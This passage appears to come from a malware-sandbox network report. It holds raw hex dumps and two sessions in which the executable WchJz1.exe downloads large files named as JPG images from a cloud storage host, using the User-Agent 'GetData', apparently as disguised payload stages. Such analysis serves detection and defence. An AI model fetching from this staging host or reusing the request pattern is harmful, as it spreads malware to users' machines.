49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49773	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:13:13 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:14 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:14 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 676AC17A2C1E933338E44788 Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 10
2024-12-24 14:13:14 UTC	3548	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 Data Ascii: B;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c Data Ascii: E^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca Data Ascii: ~07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
2024-12-24 14:13:14 UTC	4096	IN	Data Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49807	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:13:28 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:28 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:28 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 676AC18809E5983333267492 Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 10
2024-12-24 14:13:28 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
